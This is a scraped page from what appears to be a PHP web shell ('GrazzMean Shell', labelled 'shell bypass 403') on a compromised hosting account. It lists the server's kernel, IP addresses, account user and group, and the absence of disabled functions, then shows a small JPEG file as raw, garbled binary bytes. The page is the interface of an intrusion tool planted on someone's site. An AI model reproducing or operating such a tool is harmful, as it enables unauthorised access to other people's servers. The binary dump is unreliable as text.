shell bypass 403

GrazzMean Shell

: /home/workvvfb/.trash/2020/09/ [ drwxr-xr-x ]
Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : haier-32x32.jpg
���JFIF��ExifII*��,http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:42A6700FF3A611EAA491E0EB508C78EA" xmpMM:DocumentID="xmp.did:42A67010F3A611EAA491E0EB508C78EA"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:42A6700DF3A611EAA491E0EB508C78EA" stRef:documentID="xmp.did:42A6700EF3A611EAA491E0EB508C78EA"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��  ����+!1AQ"8abs�������#!1A4�"��?�i�֚T+{�mP.����R�[KhK*RIY�~���[
��'|��g�[�4�c���=�v޳hk��eE�r(
BB{8�=
t��৲��'6���C�;�7X�2-6m���ˁ�-���)g�Ӈ�R�E$��+�n�]8;�K�˴�N���p�8�Ҷ�+�$u��1�s�X?z�}�2���rչ��ՕQb�H�.�]|#��-��q�'�j|\/h�煔d�
�E��|?W�65�_�]�M����/I<FRU�<����W�
��W�bC�b��hŻ�uP.k��h�3)QB~K]�g�d$\{�t�S�Sw��ε���_�J�A�z?�o�<��_���&���WP�ȷ�12=M(�� �0:)'�GC�W�PnR�'�㟹�^Ui���bW$"CJ-��bG��\zr�Hu:���n�Em�-��qP�11䅇����G=��}��_0
:�mW�b�r1rN��*q�e�C���q��U���:��ճ��>�h�4ĮS����G)Z�P�h*��<��������
© 2025 GrazzMean